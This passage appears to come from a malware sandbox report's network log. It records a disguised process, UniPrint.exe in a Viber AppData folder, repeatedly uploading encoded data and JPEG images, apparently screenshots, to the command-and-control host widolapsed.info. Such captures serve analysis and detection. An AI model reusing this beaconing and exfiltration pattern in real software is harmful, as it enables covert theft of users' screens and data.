01
                                                                                                      Data Ascii: 3EasFiLf4\v3Ma34ffsI.Lf4;WIIFh3IHaLE!fXZ)3IwE4LV)pSsFhREQ i3ARBJCE%-1ih6((((()RQ@IKE%Q@Q@E%Z-%PJ(h(`QE ((ZJ(h
                                                                                                      2021-09-15 11:46:27 UTC2030OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 30 31 37 36 33 31 32 38 31 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------4017631281--
                                                                                                      2021-09-15 11:46:28 UTC2030INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:27 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=6583dead22c22515029b64a39588f30f5b577db3d99bb62ba98929bd98d2a199; expires=Thu, 15-Sep-2022 11:46:27 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:28 UTC2030INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      26192.168.2.34981745.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:29 UTC2030OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76635
                                                                                                      Content-Type: multipart/form-data; boundary=--------3576073818
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:29 UTC2030OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 35 37 36 30 37 33 38 31 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3576073818Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:29 UTC2030OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 e7 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:29 UTC2030OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:29 UTC2046OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:29 UTC2062OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:29 UTC2078OUTData Raw: 46 e7 80 a4 fe 15 a2 75 2d 3e 3f f5 76 a4 fd 69 0e b8 17 fd 55 ac 63 eb 47 b4 a8 f6 88 7b 0a 6b 79 15 16 d2 76 e9 19 fc aa dd a6 9b 71 e6 86 28 7a d4 6d ae dd 1f ba 11 7e 82 98 9a ad e3 c8 b9 94 e0 9e c2 a6 4a b3 46 94 d5 08 c9 6e cb 9e 33 5d b0 da 83 e9 5c be 9f ff 00 21 1b 7f fa e8 b5 d3 78 c4 96 b6 b4 27 a9 5a e6 74 ff 00 f9 08 db ff 00 d7 41 fc e9 61 ff 00 80 75 d6 fe 31 e8 5a 8a 5b 99 83 4d 28 53 8e 95 48 cd a6 c7 d5 c9 aa de 24 24 5e ae 0f f0 d6 2f 5e f5 85 0a 1c d0 4d b2 71 38 ce 4a 8e 2a 27 40 75 3d 3d 3e e4 44 d3 0e b9 12 ff 00 ab b7 15 85 45 6e b0 b0 ea 72 3c 7d 5e 86 c3 6b f3 7f 04 6a 2a 07 d6 6e db a3 63 e9 59 d4 55 2c 3d 35 d0 c9 e2 eb 3e a5 b6 d4 2e 5f ef 4a df 9d 37 ce 91 ba b9 3f 8d 57 a7 2d 5f b3 8a d9 12 ab 4d ee c9 77 13 d4 9a 5c d3 45
                                                                                                      Data Ascii: Fu->?viUcG{kyvq(zm~JFn3]\!x'ZtAau1Z[M(SH$$^/^Mq8J*'@u==>DEnr<}^kj*ncYU,=5>._J7?W-_Mw\E
                                                                                                      2021-09-15 11:46:29 UTC2094OUTData Raw: 4a 28 a2 80 0a 28 a2 80 16 8a 4a 28 01 69 69 b4 b4 08 5a 4a 28 a0 05 cd 14 94 50 02 d1 49 45 00 2d 14 51 40 0b 45 25 2d 31 05 2d 25 14 c0 28 a2 8a 40 14 51 45 00 14 51 45 00 14 b4 94 50 02 d1 49 4b 4c 02 8a 28 a0 42 d1 49 45 00 2d 14 94 50 02 d1 49 45 00 2d 14 51 40 05 14 51 4c 42 d2 51 45 00 2d 14 51 40 05 14 51 40 05 14 51 40 0b 45 20 a5 a6 20 a5 a4 a3 34 00 b4 52 66 8a 00 5a 33 49 45 00 2e 68 a4 a5 a0 41 45 14 50 01 4b 49 4b 4c 02 96 92 8a 00 5e f4 51 45 00 14 52 52 d3 01 68 a4 a2 81 0b 45 25 2d 00 2d 14 94 53 10 b4 51 45 00 2d 25 19 a2 80 16 8a 28 a0 02 96 92 8a 00 5a 05 25 2d 31 0b 46 69 28 a6 21 73 46 69 28 a0 07 66 8a 6d 2d 17 0b 0b 46 69 33 49 9a 2e 16 1d 9a 33 4d cd 14 5c 2c 3f 34 66 9b 46 69 dc 56 1d 9a 4c d3 69 73 4a e3 b0 b9 a5 cd 36 93 34 5c
                                                                                                      Data Ascii: J((J(iiZJ(PIE-Q@E%-1-%(@QEQEPIKL(BIE-PIE-Q@QLBQE-Q@Q@Q@E 4RfZ3IE.hAEPKIKL^QERRhE%--SQE-%(Z%-1Fi(!sFi(fm-Fi3I.3M\,?4fFiVLisJ64\
                                                                                                      2021-09-15 11:46:29 UTC2105OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 35 37 36 30 37 33 38 31 38 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3576073818--
                                                                                                      2021-09-15 11:46:29 UTC2105INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:29 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=3bf964a042be270a536051d0f612abbf134cc7dce1ec0c99752dc8740bbcc5de; expires=Thu, 15-Sep-2022 11:46:29 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:29 UTC2105INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      27192.168.2.34981845.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:30 UTC2105OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76584
                                                                                                      Content-Type: multipart/form-data; boundary=--------2060090614
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:30 UTC2106OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 30 36 30 30 39 30 36 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2060090614Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:30 UTC2106OUTData Raw: 7f 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 ea d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee 98 ef 4d 77 7d 78 7d 40 d3 6d 60 3b ea 5f 32 bb b0
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[DMw}x}@m`;_2
                                                                                                      2021-09-15 11:46:30 UTC2106OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:30 UTC2122OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:30 UTC2138OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:30 UTC2154OUTData Raw: 58 bd 7b d6 14 28 73 41 36 c9 c4 e3 39 2a 38 a8 9d 01 d4 f4 f4 fb 91 13 4c 3a e4 4b fe ae dc 56 15 15 ba c2 c3 a9 c8 f1 f5 7a 1b 0d af cd fc 11 a8 a8 1f 59 bb 6e 8d 8f a5 67 51 54 b0 f4 d7 43 27 8b ac fa 96 db 50 b9 7f bd 2b 7e 74 df 3a 46 ea e4 fe 35 5e 9c b5 7e ce 2b 64 4a ad 37 bb 25 dc 4f 52 69 73 4d 14 b4 ac 5a 93 63 a9 c2 9b 9a 5c d2 2d 31 d9 a7 03 51 d3 c5 26 8a 4c 7d 28 a6 8a 5a 93 44 c7 53 85 30 1a 76 45 22 93 1d 9a 70 a6 66 97 26 a5 a2 d3 24 a2 9a 09 a5 fa 9a 4d 14 98 f1 4b 91 51 ef 41 d5 87 e7 4c 6b 98 13 ab 83 4b 95 87 3a 5d 4b 20 fc a7 e9 5c 67 8a 3f e3 f6 2f fa e4 2b a6 3a 94 0b 90 32 6b 99 f1 29 cd dc 27 fe 99 0f e7 55 18 b5 b8 29 a9 4b 43 8b a2 8a dc bc 29 0f 85 f4 e3 1c ba 7c 6f 34 2e 5e 37 b5 0d 34 a7 cd 61 90 fb 0e 30 07 f7 87 4a e0 6e
                                                                                                      Data Ascii: X{(sA69*8L:KVzYngQTC'P+~t:F5^~+dJ7%ORisMZc\-1Q&L}(ZDS0vE"pf&$MKQALkK:]K \g?/+:2k)'U)KC)|o4.^74a0Jn
                                                                                                      2021-09-15 11:46:30 UTC2170OUTData Raw: 51 49 4b 4c 05 a2 92 8a 04 2d 14 94 b4 00 b4 52 51 4c 42 d1 45 14 00 b4 94 66 8a 00 5a 28 a2 80 0a 5a 4a 28 01 68 14 94 b4 c4 2d 19 a4 a2 98 85 cd 19 a4 a2 80 1d 9a 29 b4 b4 5c 2c 2d 19 a4 cd 26 68 b8 58 76 68 cd 37 34 51 70 b0 fc d1 9a 6d 19 a7 71 58 76 69 33 4d a5 cd 2b 8e c2 e6 97 34 da 4c d1 70 b0 ea 33 49 9a 28 b8 58 76 69 0d 25 19 a7 70 b0 51 49 45 20 16 8c d2 51 40 58 5c d1 4d cd 19 a5 71 d8 5a 33 4d cd 19 a2 e1 61 73 46 69 33 49 9a 57 1d 87 66 92 93 34 66 8b 85 85 a2 93 34 66 90 0b 9a 4a 4c d2 13 45 c7 61 73 49 9a 4a 29 5c 76 16 92 8a 4a 06 29 a4 a2 8a 40 2d 25 14 50 01 45 14 50 03 81 a3 34 dc d1 9a 77 0b 0b 9a 29 29 29 05 85 a0 d1 9a 4a 43 0a 05 14 50 02 d1 45 25 31 10 51 45 2d 64 6a 14 55 bd 33 4c bd d5 6e 1e 0d 3e 0f 3a 44 42 ec bb 82 e1 72 06
                                                                                                      Data Ascii: QIKL-RQLBEfZ(ZJ(h-)\,-&hXvh74QpmqXvi3M+4Lp3I(Xvi%pQIE Q@X\MqZ3MasFi3IWf4f4fJLEasIJ)\vJ)@-%PEP4w)))JCPE%1QE-djU3Ln>:DBr
                                                                                                      2021-09-15 11:46:30 UTC2180OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 30 36 30 30 39 30 36 31 34 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2060090614--
                                                                                                      2021-09-15 11:46:31 UTC2180INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:30 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=644e733c34fda1ac1be1a5f8792b47c5c52e62b9da7ec7efb9e808c0a5708dce; expires=Thu, 15-Sep-2022 11:46:30 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:31 UTC2181INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      28192.168.2.34981945.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:31 UTC2181OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76670
                                                                                                      Content-Type: multipart/form-data; boundary=--------1263745405
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:31 UTC2181OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 32 36 33 37 34 35 34 30 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1263745405Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:31 UTC2181OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 ba d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:31 UTC2181OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:31 UTC2197OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
